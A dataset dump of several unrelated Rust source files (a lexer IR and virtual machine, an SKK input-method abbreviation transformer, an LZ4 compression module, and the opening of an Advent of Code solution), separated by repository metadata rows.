writeln!(f, "l{}(λ):", i)?;
for op in ops { fmt_op(op, f)? }
},
};
}
Ok(())
}
}
fn fmt_op<T: std::fmt::Display>(op: &Op<T>, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
use Op::*;
write!(f, " ")?;
match op {
Shift =>
writeln!(f, "shift")?,
JumpMatches { from, to, on_success } =>
writeln!(f, "jm {:?} {:?} l{}", from, to, on_success)?,
JumpNotMatches { from, to, on_failure } =>
writeln!(f, "jnm {:?} {:?} l{}", from, to, on_failure)?,
LoopMatches { from, to } =>
writeln!(f, "lm {:?} {:?}", from, to)?,
Jump(to) =>
writeln!(f, "jump l{}", to)?,
Set(act) =>
writeln!(f, "set {}", act)?,
Halt =>
writeln!(f, "halt")?,
};
Ok(())
}
impl<T: std::fmt::Display> Ir<T> {
pub fn pretty(&self) -> PrettyIr<'_, T> {
PrettyIr(self)
}
}
impl<T: Clone> Ir<T> {
/// Create IR from DFA
pub fn from_automata(automata: Automata<T>) -> Ir<T> {
let terminal = automata.find_terminal_node();
let node_kinds = automata.node_kinds();
let mut state_blocks: Vec<Option<usize>> =
vec![None; automata.states.len()];
let mut blocks = vec![
Block::Func::<T>(vec![])
];
state_blocks[0] = Some(0);
fn insert_block<T>(
st: usize,
state_blocks: &mut [Option<usize>],
blocks: &mut Vec<Block<T>>,
node_kinds: &[NodeKind]
) -> usize {
if let Some(i) = state_blocks[st] {
i
}
else {
let i = blocks.len();
let block =
if node_kinds[st] == NodeKind::Sink {
Block::Func(vec![])
}
else { Block::Block(vec![]) };
blocks.push(block);
state_blocks[st] = Some(i);
i
}
}
let mut queue = VecDeque::new();
queue.push_back(0usize);
queue.push_back(terminal);
let terminal_block = insert_block(
terminal,
&mut state_blocks,
&mut blocks,
&node_kinds
);
while let Some(st) = queue.pop_front() {
let block_ix = state_blocks[st].unwrap();
// Inital and terminal do not shift
if st != 0 && st != terminal {
blocks[block_ix].push(Op::Shift)
}
if let Some(State::Action(act)) = automata.get(st) {
blocks[block_ix].push(Op::Set(act.clone()))
}
match node_kinds[st] {
NodeKind::Sink | NodeKind::Fork => {
let (loops, next) = automata.transitions_from(st)
.partition::<Vec<_>, _>(|&(_, to)| to == st);
for (ch, _) in loops {
blocks[block_ix].push(Op::LoopMatches {
from: ch.start,
to: ch.end,
});
}
for (ch, to) in next {
if state_blocks[to].is_none() {
queue.push_back(to)
}
let to_block = insert_block(
to,
&mut state_blocks,
&mut blocks,
&node_kinds
);
blocks[block_ix].push(Op::JumpMatches {
from: ch.start,
to: ch.end,
on_success: to_block,
});
}
},
NodeKind::Link => {
let (loops, next) = automata.transitions_from(st)
.partition::<Vec<_>, _>(|&(_, to)| to == st);
for (ch, _) in loops {
blocks[block_ix].push(Op::LoopMatches {
from: ch.start,
to: ch.end,
});
}
let mut jumps = 0;
for (ch, to) in next {
if to == terminal { continue }
jumps += 1;
if state_blocks[to].is_none() {
queue.push_back(to)
}
let to_block = insert_block(
to,
&mut state_blocks,
&mut blocks,
&node_kinds
);
blocks[block_ix].push(Op::JumpNotMatches {
from: ch.start,
to: ch.end,
on_failure: terminal_block,
});
blocks[block_ix].push(Op::Jump(to_block));
}
if jumps == 0 {
blocks[block_ix].push(Op::Halt)
}
},
NodeKind::Leaf => {
for (ch, to) in automata.transitions_from(st) {
if to == terminal { continue }
blocks[block_ix].push(Op::LoopMatches {
from: ch.start,
to: ch.end,
});
}
blocks[block_ix].push(Op::Halt)
},
NodeKind::Terminal =>
match blocks[block_ix].ops().last() {
Some(Op::Halt) => (),
_ => blocks[block_ix].push(Op::Halt),
}
}
}
Ir { blocks }
}
/// Convert IR to the code suitable for VM execution
pub fn flatten(&self) -> Vec<Op<T>> {
let mut code = vec![];
let mut symbol_map = Vec::with_capacity(self.blocks.len());
let mut code_len = 0;
for block in &self.blocks {
code.extend(block.ops().iter().cloned());
symbol_map.push(code_len);
code_len += block.ops().len();
}
for op in &mut code {
match op {
Op::JumpMatches { on_success: loc, .. }
| Op::JumpNotMatches { on_failure: loc, ..}
| Op::Jump(loc) =>
*loc = symbol_map[*loc],
_ => (),
}
}
code
}
}
#[derive(Debug, Clone, Copy, PartialEq)]
/// Result returned by `Vm`
pub enum VmResult<T> {
/// Action with span `start..end`
Action {
start: usize,
end: usize,
action: T
},
/// Error with span `start..end`
Error {
start: usize,
end: usize,
},
/// End of input
Eoi,
}
#[derive(Debug, Clone)]
pub struct Cursor<'input> {
pub input: &'input str,
pub head: Option<char>,
iter: std::str::Chars<'input>,
pos: usize,
}
impl<'input> Cursor<'input> {
pub fn new(input: &'input str) -> Self {
let mut iter = input.chars();
let head = iter.next();
let pos = 0;
Cursor { input, iter, head, pos }
}
pub fn position(&self) -> usize {
self.pos
}
pub fn shift(&mut self) {
self.pos += self.head
.map(char::len_utf8)
.unwrap_or(1);
self.head = self.iter.next();
}
/// Set the cursor position
pub fn rewind(&mut self, pos: usize) {
self.iter = self.input[pos..].chars();
self.head = self.iter.next();
self.pos = pos;
}
pub fn is_eoi(&self) -> bool {
self.head.is_none()
}
}
#[derive(Debug, Clone)]
pub struct Vm<'code, 'input, T> {
pub cursor: Cursor<'input>,
code: &'code [Op<T>],
}
impl<'code, 'input, T: Clone> Vm<'code, 'input, T> {
pub fn new(code: &'code [Op<T>], input: &'input str) -> Self {
let cursor = Cursor::new(input);
Vm { cursor, code }
}
/// Execute the loaded code
pub fn run(&mut self) -> VmResult<T> {
let mut inst_ptr = 0;
let mut jump_ptr = 0;
let mut action = None;
let start = self.cursor.position();
let mut end = start;
if self.cursor.is_eoi() {
return VmResult::Eoi
}
loop {
match &self.code[inst_ptr] {
Op::Shift => {
self.cursor.shift();
},
Op::JumpMatches { from, to, on_success } => {
let cursor =
if let Some(ch) = self.cursor.head { ch }
else { break };
if (*from..=*to).contains(&cursor) {
inst_ptr = *on_success;
jump_ptr = *on_success;
continue;
}
},
Op::JumpNotMatches { from, to, on_failure } => {
let cursor =
if let Some(ch) = self.cursor.head { ch }
else { break };
if (*from..=*to).contains(&cursor).not() {
inst_ptr = *on_failure;
jump_ptr = *on_failure;
continue;
}
},
Op::LoopMatches { from, to} => {
let cursor =
if let Some(ch) = self.cursor.head { ch }
else { break };
if (*from..=*to).contains(&cursor) {
inst_ptr = jump_ptr;
continue
}
},
Op::Jump(loc) => {
inst_ptr = *loc;
jump_ptr = *loc;
continue
},
Op::Set(act) => {
action = Some(act.clone());
end = self.cursor.position();
},
Op::Halt => break,
};
inst_ptr += 1;
}
if action.is_none() && self.cursor.is_eoi().not() {
return VmResult::Error {
start,
end: self.cursor.position(),
}
}
if end != self.cursor.position() { self.cursor.rewind(end) }
match action {
Some(action) =>
VmResult::Action { start, end, action },
None =>
VmResult::Eoi
}
}
}
| true |
648ebb66ae8853b70082e45cff1c8602663fb2cb
|
Rust
|
tett23/rskk-core
|
/src/transformers/abbr.rs
|
UTF-8
| 6,348 | 2.765625 | 3 |
[
"MIT"
] |
permissive
|
use super::{
AsTransformerTrait, ContinuousTransformer, Displayable, KeyCode, SelectCandidateTransformer,
Stackable, StoppedTransformer, Transformable, TransformerTypes, UnknownWordTransformer,
WithContext, Word,
};
use crate::Context;
#[derive(Clone)]
pub struct AbbrTransformer {
context: Context,
stack: Vec<Box<dyn Transformable>>,
}
impl AbbrTransformer {
pub fn new(context: Context) -> Self {
Self {
context: context.clone(),
stack: vec![box ContinuousTransformer::new(
context.new_empty(),
TransformerTypes::Direct,
)],
}
}
fn try_composition(&self) -> Box<dyn Transformable> {
self
.try_transition_to_select_candidate()
.map(|tf| -> Box<dyn Transformable> { box tf })
.unwrap_or(box self.transition_to_unknown_word())
}
fn try_transition_to_select_candidate(&self) -> Option<SelectCandidateTransformer> {
self
.context
.dictionary()
.transform(self.to_word().to_dic_read()?)
.map(|dic_entry| {
SelectCandidateTransformer::new(self.clone_context(), dic_entry, self.to_word())
})
}
fn transition_to_unknown_word(&self) -> UnknownWordTransformer {
UnknownWordTransformer::new(self.clone_context(), { self.to_word() })
}
fn to_word(&self) -> Word {
Word::new_abbr(self.buffer_content())
}
fn clear_stack(&mut self) {
self.stack = vec![box ContinuousTransformer::new(
self.clone_context(),
TransformerTypes::Direct,
)]
}
}
impl WithContext for AbbrTransformer {
fn clone_context(&self) -> Context {
self.context.clone()
}
fn context(&self) -> &Context {
&self.context
}
fn set_context(&mut self, context: Context) {
self.context = context;
}
}
impl Transformable for AbbrTransformer {
fn transformer_type(&self) -> TransformerTypes {
TransformerTypes::Abbr
}
fn push_character(&self, character: char) -> Option<Vec<Box<dyn Transformable>>> {
Some(self.replace_last_element(self.stack.last()?.push_character(character)?))
}
fn push_escape(&self) -> Option<Vec<Box<dyn Transformable>>> {
Some(self.replace_last_element(self.stack.last()?.push_escape()?))
}
fn push_enter(&self) -> Option<Vec<Box<dyn Transformable>>> {
let tfs = self.stack.last()?.push_enter()?;
match &*tfs {
[] => Some(vec![]),
[last] if last.is_stopped() => Some(vec![last.clone()]),
_ => Some(self.replace_last_element(tfs)),
}
}
fn push_space(&self) -> Option<Vec<Box<dyn Transformable>>> {
let mut tf = self.clone();
match &*tf.stack {
[] => Some(vec![]),
[first] if first.transformer_type() == TransformerTypes::Continuous && first.is_empty() => {
Some(vec![])
}
[first] if first.transformer_type() == TransformerTypes::Continuous => {
tf.stack.push(tf.try_composition());
Some(vec![box tf])
}
[.., last] => Some(tf.replace_last_element(last.push_space()?)),
}
}
fn push_delete(&self) -> Option<Vec<Box<dyn Transformable>>> {
if self.stack.len() == 1 && self.is_empty() {
return Some(vec![]);
}
let tf = self.replace_last_element(self.send_target().push_delete()?);
if !tf.is_empty() {
return Some(tf);
}
let mut tf = self.clone();
tf.clear_stack();
Some(vec![box tf])
}
fn push_backspace(&self) -> Option<Vec<Box<dyn Transformable>>> {
self.push_delete()
}
fn push_any_character(&self, key_code: &KeyCode) -> Option<Vec<Box<dyn Transformable>>> {
let tfs = self.stack.last()?.push_any_character(key_code)?;
match &*tfs {
[] => Some(vec![]),
[.., last] if last.is_stopped() => Some(vec![last.clone()]),
_ => Some(self.replace_last_element(tfs)),
}
}
}
impl Displayable for AbbrTransformer {
fn buffer_content(&self) -> String {
self.send_target().buffer_content()
}
fn display_string(&self) -> String {
match &*self.stack {
[tf] if tf.transformer_type() == TransformerTypes::Continuous => {
"▽".to_owned() + &tf.display_string()
}
[.., last] => last.display_string(),
_ => "".to_owned(),
}
}
}
impl AsTransformerTrait for AbbrTransformer {
fn as_trait(&self) -> Box<dyn Transformable> {
box self.clone()
}
fn send_target(&self) -> Box<dyn Transformable> {
match self.stack.last() {
Some(tf) => tf.clone(),
None => box StoppedTransformer::completed(self.clone_context()),
}
}
}
impl Stackable for AbbrTransformer {
fn push(&self, item: Box<dyn Transformable>) -> Box<dyn Transformable> {
let mut ret = self.clone();
ret.stack.push(item);
box ret
}
fn pop(&self) -> (Box<dyn Transformable>, Option<Box<dyn Transformable>>) {
let mut ret = self.clone();
let item = ret.stack.pop();
if ret.stack.len() == 0 {
return (self.to_canceled(), item);
}
(box ret, item)
}
fn replace_last_element(
&self,
items: Vec<Box<dyn Transformable>>,
) -> Vec<Box<dyn Transformable>> {
let mut ret = self.clone();
ret.stack.pop();
items.iter().for_each(|item| ret.stack.push(item.clone()));
if ret.stack.len() == 0 {
return vec![];
}
vec![box ret]
}
fn stack(&self) -> Vec<Box<dyn Transformable>> {
self.stack.clone()
}
}
#[cfg(test)]
mod tests {
use crate::tests::dummy_context;
use crate::transformers::StoppedReason::*;
use crate::transformers::TransformerTypes::*;
#[test]
fn it_works() {
let conf = dummy_context();
let vec = crate::tds![conf, Abbr;
["[backspace]", { display: "", transformer_type: Stopped(Canceled) }],
["a[backspace]", { display: "▽", transformer_type: Abbr }],
["test", { display: "▽test", transformer_type: Abbr }],
["test\n", { display: "", stopped_buffer: "test", transformer_type: Stopped(Compleated) }],
["hoge ", { display: "[登録: hoge]", transformer_type: Abbr }],
["hoge [escape]", { display: "▽hoge", transformer_type: Abbr }],
["hoge [backspace]", { display: "[登録: hoge]", transformer_type: Abbr }],
["hoge fuga", { display: "[登録: hoge]ふが", transformer_type: Abbr }],
["hoge fuga\n", { display: "", stopped_buffer: "ふが", transformer_type: Stopped(Compleated) }],
];
crate::tests::helpers::TestData::batch(vec);
}
}
| true |
96ae676a879c860cfaeb9ae52c01e49915c099c1
|
Rust
|
sathorn6/rust-compress
|
/src/lz4.rs
|
UTF-8
| 23,274 | 2.703125 | 3 |
[
"MIT",
"Apache-2.0"
] |
permissive
|
/*!
LZ4 Decompression and Compression. Requires `lz4` feature, enabled by default
This module contains an implementation in Rust of decompression and compression
of LZ4-encoded streams. These are exposed as a standard `Reader` and `Writer`
interfaces wrapping an underlying stream.
# Example
```rust,ignore
use compress::lz4;
use std::fs::File;
use std::path::Path;
use std::io::Read;
let stream = File::open(&Path::new("path/to/file.lz4")).unwrap();
let mut decompressed = Vec::new();
lz4::Decoder::new(stream).read_to_end(&mut decompressed);
```
# Credit
This implementation is largely based on Branimir Karadžić's implementation which
can be found at https://github.com/bkaradzic/go-lz4.
*/
use std::cmp;
use std::ptr::copy_nonoverlapping;
use std::io::{self, Read, Write};
use std::iter::repeat;
use std::vec::Vec;
use std::num::Wrapping;
use std::ops::Shr;
use super::byteorder::{LittleEndian, WriteBytesExt, ReadBytesExt};
use super::{ReadExact, byteorder_err_to_io};
const MAGIC: u32 = 0x184d2204;
const ML_BITS: u32 = 4;
const ML_MASK: u32 = (1 << ML_BITS as usize) - 1;
const RUN_BITS: u32 = 8 - ML_BITS;
const RUN_MASK: u32 = (1 << RUN_BITS as usize) - 1;
const MIN_MATCH: u32 = 4;
const HASH_LOG: u32 = 17;
const HASH_TABLE_SIZE: u32 = 1 << (HASH_LOG as usize);
const HASH_SHIFT: u32 = (MIN_MATCH * 8) - HASH_LOG;
const INCOMPRESSIBLE: u32 = 128;
const UNINITHASH: u32 = 0x88888888;
const MAX_INPUT_SIZE: u32 = 0x7e000000;
struct BlockDecoder<'a> {
input: &'a [u8],
output: &'a mut Vec<u8>,
cur: usize,
start: usize,
end: usize,
}
impl<'a> BlockDecoder<'a> {
/// Decodes this block of data from 'input' to 'output', returning the
/// number of valid bytes in the output.
fn decode(&mut self) -> usize {
while self.cur < self.input.len() {
let code = self.bump();
debug!("block with code: {:x}", code);
// Extract a chunk of data from the input to the output.
{
let len = self.length(code >> 4);
debug!("consume len {}", len);
if len > 0 {
let end = self.end;
self.grow_output(end + len);
unsafe { copy_nonoverlapping(
&self.input[self.cur],
&mut self.output[end],
len
)};
self.end += len;
self.cur += len;
}
}
if self.cur == self.input.len() { break }
// Read off the next i16 offset
{
let back = (self.bump() as usize) | ((self.bump() as usize) << 8);
debug!("found back {}", back);
self.start = self.end - back;
}
// Slosh around some bytes now
{
let mut len = self.length(code & 0xf);
let literal = self.end - self.start;
if literal < 4 {
static DECR: [usize; 4] = [0, 3, 2, 3];
self.cp(4, DECR[literal]);
} else {
len += 4;
}
self.cp(len, 0);
}
}
self.end
}
fn length(&mut self, code: u8) -> usize {
let mut ret = code as usize;
if code == 0xf {
loop {
let tmp = self.bump();
ret += tmp as usize;
if tmp != 0xff { break }
}
}
ret
}
fn bump(&mut self) -> u8 {
let ret = self.input[self.cur];
self.cur += 1;
ret
}
#[inline]
fn cp(&mut self, len: usize, decr: usize) {
let end = self.end;
self.grow_output(end + len);
for i in 0..len {
self.output[end + i] = (*self.output)[self.start + i];
}
self.end += len;
self.start += len - decr;
}
// Extends the output vector to a target number of bytes (in total), but
// does not actually initialize the new data. The length of the vector is
// updated, but the bytes will all have undefined values. It is assumed that
// the next operation is to pave over these bytes (so the initialization is
// unnecessary).
#[inline]
fn grow_output(&mut self, target: usize) {
if self.output.capacity() < target {
debug!("growing {} to {}", self.output.capacity(), target);
//let additional = target - self.output.capacity();
//self.output.reserve(additional);
while self.output.len() < target {
self.output.push(0);
}
}else {
unsafe {
self.output.set_len(target);
}
}
}
}
struct BlockEncoder<'a> {
input: &'a [u8],
output: &'a mut Vec<u8>,
hash_table: Vec<u32>,
pos: u32,
anchor: u32,
dest_pos: u32
}
/// Returns maximum possible size of compressed output
/// given source size
pub fn compression_bound(size: u32) -> Option<u32> {
if size > MAX_INPUT_SIZE {
None
} else {
Some(size + (size / 255) + 16 + 4)
}
}
impl<'a> BlockEncoder<'a> {
#[inline(always)]
fn seq_at(&self, pos: u32) -> u32 {
(self.input[pos as usize + 3] as u32) << 24
| (self.input[pos as usize + 2] as u32) << 16
| (self.input[pos as usize + 1] as u32) << 8
| (self.input[pos as usize] as u32)
}
fn write_literals(&mut self, len: u32, ml_len: u32, pos: u32) {
let mut ln = len;
let code = if ln > RUN_MASK - 1 { RUN_MASK as u8 } else { ln as u8 };
if ml_len > ML_MASK - 1 {
self.output[self.dest_pos as usize] = (code << ML_BITS as usize) + ML_MASK as u8;
} else {
self.output[self.dest_pos as usize] = (code << ML_BITS as usize) + ml_len as u8;
}
self.dest_pos += 1;
if code == RUN_MASK as u8 {
ln -= RUN_MASK;
while ln > 254 {
self.output[self.dest_pos as usize] = 255;
self.dest_pos += 1;
ln -= 255;
}
self.output[self.dest_pos as usize] = ln as u8;
self.dest_pos += 1;
}
// FIXME: find out why slicing syntax fails tests
//self.output[self.dest_pos as usize .. (self.dest_pos + len) as usize] = self.input[pos as uint.. (pos + len) as uint];
for i in 0..(len as usize) {
self.output[self.dest_pos as usize + i] = self.input[pos as usize + i];
}
self.dest_pos += len;
}
fn encode(&mut self) -> u32 {
let input_len = self.input.len() as u32;
match compression_bound(input_len) {
None => 0,
Some(out_size) => {
let out_size_usize = out_size as usize;
if self.output.capacity() < out_size_usize {
let additional = out_size_usize - self.output.capacity();
self.output.reserve(additional);
}
unsafe {self.output.set_len(out_size_usize); }
let mut step = 1u32;
let mut limit = INCOMPRESSIBLE;
loop {
if self.pos + 12 > input_len {
let tmp = self.anchor;
self.write_literals(self.input.len() as u32 - tmp, 0, tmp);
unsafe { self.output.set_len(self.dest_pos as usize) };
return self.dest_pos;
}
let seq = self.seq_at(self.pos);
let hash = (Wrapping(seq) * Wrapping(2654435761)).shr(HASH_SHIFT as usize).0;
let mut r = (Wrapping(self.hash_table[hash as usize]) + Wrapping(UNINITHASH)).0;
self.hash_table[hash as usize] = (Wrapping(self.pos) - Wrapping(UNINITHASH)).0;
if (Wrapping(self.pos) - Wrapping(r)).shr(16).0 != 0 || seq != self.seq_at(r) {
if self.pos - self.anchor > limit {
limit = limit << 1;
step += 1 + (step >> 2);
}
self.pos += step;
continue;
}
if step > 1 {
self.hash_table[hash as usize] = r - UNINITHASH;
self.pos -= step - 1;
step = 1;
continue;
}
limit = INCOMPRESSIBLE;
let ln = self.pos - self.anchor;
let back = self.pos - r;
let anchor = self.anchor;
self.pos += MIN_MATCH;
r += MIN_MATCH;
self.anchor = self.pos;
while (self.pos < input_len - 5) && self.input[self.pos as usize] == self.input[r as usize] {
self.pos += 1;
r += 1
}
let mut ml_len = self.pos - self.anchor;
self.write_literals(ln, ml_len, anchor);
self.output[self.dest_pos as usize] = back as u8;
self.output[self.dest_pos as usize + 1] = (back >> 8) as u8;
self.dest_pos += 2;
if ml_len > ML_MASK - 1 {
ml_len -= ML_MASK;
while ml_len > 254 {
ml_len -= 255;
self.output[self.dest_pos as usize] = 255;
self.dest_pos += 1;
}
self.output[self.dest_pos as usize] = ml_len as u8;
self.dest_pos += 1;
}
self.anchor = self.pos;
}
}
}
}
}
/// This structure is used to decode a stream of LZ4 blocks. This wraps an
/// internal reader which is read from when this decoder's read method is
/// called.
pub struct Decoder<R> {
/// The internally wrapped reader. This is exposed so it may be moved out
/// of. Note that if data is read from the reader while decoding is in
/// progress the output stream will get corrupted.
pub r: R,
temp: Vec<u8>,
output: Vec<u8>,
start: usize,
end: usize,
eof: bool,
header: bool,
blk_checksum: bool,
stream_checksum: bool,
max_block_size: usize,
}
impl<R: Read + Sized> Decoder<R> {
/// Creates a new decoder which will read data from the given stream. The
/// inner stream can be re-acquired by moving out of the `r` field of this
/// structure.
pub fn new(r: R) -> Decoder<R> {
Decoder {
r: r,
temp: Vec::new(),
output: Vec::new(),
header: false,
blk_checksum: false,
stream_checksum: false,
start: 0,
end: 0,
eof: false,
max_block_size: 0,
}
}
/// Resets this decoder back to its initial state. Note that the underlying
/// stream is not seeked on or has any alterations performed on it.
pub fn reset(&mut self) {
self.header = false;
self.eof = false;
self.start = 0;
self.end = 0;
}
fn read_header(&mut self) -> io::Result<()> {
// Make sure the magic number is what's expected.
if try!(self.r.read_u32::<LittleEndian>()) != MAGIC {
return Err(io::Error::new(io::ErrorKind::InvalidInput, ""))
}
let mut bits = [0; 3];
try!(self.r.read(&mut bits[..2]));
let flg = bits[0];
let bd = bits[1];
// bits 7/6, the version number. Right now this must be 1
if (flg >> 6) != 0b01 {
return Err(io::Error::new(io::ErrorKind::InvalidInput, ""))
}
// bit 5 is the "block independence", don't care about this yet
// bit 4 is whether blocks have checksums or not
self.blk_checksum = (flg & 0x10) != 0;
// bit 3 is whether there is a following stream size
let stream_size = (flg & 0x08) != 0;
// bit 2 is whether there is a stream checksum
self.stream_checksum = (flg & 0x04) != 0;
// bit 1 is reserved
// bit 0 is whether there is a preset dictionary
let preset_dictionary = (flg & 0x01) != 0;
static MAX_SIZES: [usize; 8] =
[0, 0, 0, 0, // all N/A
64 << 10, // 64KB
256 << 10, // 256 KB
1 << 20, // 1MB
4 << 20]; // 4MB
// bit 7 is reserved
// bits 6-4 are the maximum block size
let max_block_size = MAX_SIZES[(bd >> 4) as usize & 0x7];
// bits 3-0 are reserved
// read off other portions of the stream
let size = if stream_size {
Some(try!(self.r.read_u64::<LittleEndian>()))
} else {
None
};
assert!(!preset_dictionary, "preset dictionaries not supported yet");
debug!("blk: {}", self.blk_checksum);
debug!("stream: {}", self.stream_checksum);
debug!("max size: {}", max_block_size);
debug!("stream size: {:?}", size);
self.max_block_size = max_block_size;
// XXX: implement checksums
let cksum = try!(self.r.read_u8());
debug!("ignoring header checksum: {}", cksum);
return Ok(());
}
fn decode_block(&mut self) -> io::Result<bool> {
match try!(self.r.read_u32::<LittleEndian>()) {
// final block, we're done here
0 => return Ok(false),
// raw block to read
n if n & 0x80000000 != 0 => {
let amt = (n & 0x7fffffff) as usize;
self.output.truncate(0);
self.output.reserve(amt);
try!(self.r.push_exactly(amt as u64, &mut self.output));
self.start = 0;
self.end = amt;
}
// actual block to decompress
n => {
let n = n as usize;
self.temp.truncate(0);
self.temp.reserve(n);
try!(self.r.push_exactly(n as u64, &mut self.temp));
let target = cmp::min(self.max_block_size, 4 * n / 3);
self.output.truncate(0);
self.output.reserve(target);
let mut decoder = BlockDecoder {
input: &self.temp[..n],
output: &mut self.output,
cur: 0,
start: 0,
end: 0,
};
self.start = 0;
self.end = decoder.decode();
}
}
if self.blk_checksum {
let cksum = try!(self.r.read_u32::<LittleEndian>());
debug!("ignoring block checksum {}", cksum);
}
return Ok(true);
}
/// Tests whether the end of this LZ4 stream has been reached
pub fn eof(&mut self) -> bool { self.eof }
}
impl<R: Read> Read for Decoder<R> {
fn read(&mut self, dst: &mut [u8]) -> io::Result<usize> {
if self.eof { return Ok(0) }
if !self.header {
try!(self.read_header());
self.header = true;
}
let mut amt = dst.len();
let len = amt;
while amt > 0 {
if self.start == self.end {
let keep_going = try!(self.decode_block());
if !keep_going {
self.eof = true;
break;
}
}
let n = cmp::min(amt, self.end - self.start);
unsafe { copy_nonoverlapping(
&self.output[self.start],
&mut dst[len - amt],
n
)};
self.start += n;
amt -= n;
}
Ok(len - amt)
}
}
/// This structure is used to compress a stream of bytes using the LZ4
/// compression algorithm. This is a wrapper around an internal writer which
/// bytes will be written to.
pub struct Encoder<W> {
w: W,
buf: Vec<u8>,
tmp: Vec<u8>,
wrote_header: bool,
limit: usize,
}
impl<W: Write> Encoder<W> {
/// Creates a new encoder which will have its output written to the given
/// output stream. The output stream can be re-acquired by calling
/// `finish()`
///
/// NOTE: compression isn't actually implemented just yet, this is just a
/// skeleton of a future implementation.
pub fn new(w: W) -> Encoder<W> {
Encoder {
w: w,
wrote_header: false,
buf: Vec::with_capacity(1024),
tmp: Vec::new(),
limit: 256 * 1024,
}
}
fn encode_block(&mut self) -> io::Result<()> {
self.tmp.truncate(0);
if self.compress() {
try!(self.w.write_u32::<LittleEndian>(self.tmp.len() as u32));
try!(self.w.write(&self.tmp));
} else {
try!(self.w.write_u32::<LittleEndian>((self.buf.len() as u32) | 0x80000000));
try!(self.w.write(&self.buf));
}
self.buf.truncate(0);
Ok(())
}
fn compress(&mut self) -> bool {
false
}
/// This function is used to flag that this session of compression is done
/// with. The stream is finished up (final bytes are written), and then the
/// wrapped writer is returned.
pub fn finish(mut self) -> (W, io::Result<()>) {
let mut result = self.flush();
for _ in 0..2 {
let tmp = self.w.write_u32::<LittleEndian>(0)
.map_err(byteorder_err_to_io);
result = result.and_then(|_| tmp);
}
(self.w, result)
}
}
impl<W: Write> Write for Encoder<W> {
fn write(&mut self, mut buf: &[u8]) -> io::Result<usize> {
if !self.wrote_header {
try!(self.w.write_u32::<LittleEndian>(MAGIC));
// version 01, turn on block independence, but turn off
// everything else (we have no checksums right now).
try!(self.w.write_u8(0b01_100000));
// Maximum block size is 256KB
try!(self.w.write_u8(0b0_101_0000));
// XXX: this checksum is just plain wrong.
try!(self.w.write_u8(0));
self.wrote_header = true;
}
while buf.len() > 0 {
let amt = cmp::min(self.limit - self.buf.len(), buf.len());
self.buf.extend(buf[..amt].iter().map(|b| *b));
if self.buf.len() == self.limit {
try!(self.encode_block());
}
buf = &buf[amt..];
}
Ok(buf.len())
}
fn flush(&mut self) -> io::Result<()> {
if self.buf.len() > 0 {
try!(self.encode_block());
}
self.w.flush()
}
}
/// Decodes pure LZ4 block into output. Returns count of bytes
/// processed.
pub fn decode_block(input: &[u8], output: &mut Vec<u8>) -> usize {
let mut b = BlockDecoder {
input: input,
output: output,
cur: 0,
start: 0,
end: 0
};
b.decode()
}
/// Encodes input into pure LZ4 block. Return count of bytes
/// processed.
pub fn encode_block(input: &[u8], output: &mut Vec<u8>) -> usize {
let mut encoder = BlockEncoder {
input: input,
output: output,
hash_table: repeat(0).take(HASH_TABLE_SIZE as usize).collect(),
pos: 0,
anchor: 0,
dest_pos: 0
};
encoder.encode() as usize
}
#[cfg(test)]
mod test {
use std::io::{BufReader, BufWriter, Read, Write};
use super::super::rand;
use super::{Decoder, Encoder};
#[cfg(feature="unstable")]
use test;
use super::super::byteorder::ReadBytesExt;
fn test_decode(input: &[u8], output: &[u8]) {
let mut d = Decoder::new(BufReader::new(input));
let mut buf = Vec::new();
d.read_to_end(&mut buf).unwrap();
assert!(&buf[..] == output);
}
#[test]
fn decode() {
let reference = include_bytes!("data/test.txt");
test_decode(include_bytes!("data/test.lz4.1"), reference);
test_decode(include_bytes!("data/test.lz4.2"), reference);
test_decode(include_bytes!("data/test.lz4.3"), reference);
test_decode(include_bytes!("data/test.lz4.4"), reference);
test_decode(include_bytes!("data/test.lz4.5"), reference);
test_decode(include_bytes!("data/test.lz4.6"), reference);
test_decode(include_bytes!("data/test.lz4.7"), reference);
test_decode(include_bytes!("data/test.lz4.8"), reference);
test_decode(include_bytes!("data/test.lz4.9"), reference);
}
#[test]
fn raw_encode_block() {
let data = include_bytes!("data/test.txt");
let mut encoded = Vec::new();
super::encode_block(data, &mut encoded);
let mut decoded = Vec::new();
super::decode_block(&encoded[..], &mut decoded);
assert_eq!(&data[..], &decoded[..]);
}
#[test]
fn one_byte_at_a_time() {
let input = include_bytes!("data/test.lz4.1");
let mut d = Decoder::new(BufReader::new(&input[..]));
assert!(!d.eof());
let mut out = Vec::new();
loop {
match d.read_u8() {
Ok(b) => out.push(b),
Err(..) => break
}
}
assert!(d.eof());
assert!(&out[..] == &include_bytes!("data/test.txt")[..]);
}
#[test]
fn random_byte_lengths() {
let input = include_bytes!("data/test.lz4.1");
let mut d = Decoder::new(BufReader::new(&input[..]));
let mut out = Vec::new();
let mut buf = [0u8; 40];
loop {
match d.read(&mut buf[..(1 + rand::random::<usize>() % 40)]) {
Ok(0) => break,
Ok(n) => {
out.extend(buf[..n].iter().map(|b| *b));
}
Err(..) => break
}
}
assert!(&out[..] == &include_bytes!("data/test.txt")[..]);
}
fn roundtrip(bytes: &[u8]) {
let mut e = Encoder::new(BufWriter::new(Vec::new()));
e.write(bytes).unwrap();
let (e, err) = e.finish();
err.unwrap();
let encoded = e.into_inner().unwrap();
let mut d = Decoder::new(BufReader::new(&encoded[..]));
let mut decoded = Vec::new();
d.read_to_end(&mut decoded).unwrap();
assert_eq!(&decoded[..], bytes);
}
#[test]
fn some_roundtrips() {
roundtrip(b"test");
roundtrip(b"");
roundtrip(include_bytes!("data/test.txt"));
}
#[cfg(feature="unstable")]
#[bench]
fn decompress_speed(bh: &mut test::Bencher) {
let input = include_bytes!("data/test.lz4.9");
let mut d = Decoder::new(BufReader::new(&input[..]));
let mut output = [0u8; 65536];
let mut output_size = 0;
bh.iter(|| {
d.r = BufReader::new(&input[..]);
d.reset();
output_size = d.read(&mut output).unwrap();
});
bh.bytes = output_size as u64;
}
}
| true |
ef369331e0d02abe6eaaa191a347122e35fb2533
|
Rust
|
haraldmaida/advent-of-code-2018
|
/src/day14/mod.rs
|
UTF-8
| 8,789 | 3.875 | 4 |
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
//! # Day 14: Chocolate Charts
//!
//! You finally have a chance to look at all of the produce moving around.
//! Chocolate, cinnamon, mint, chili peppers, nutmeg, vanilla... the Elves must
//! be growing these plants to make hot chocolate! As you realize this, you hear
//! a conversation in the distance. When you go to investigate, you discover two
//! Elves in what appears to be a makeshift underground kitchen/laboratory.
//!
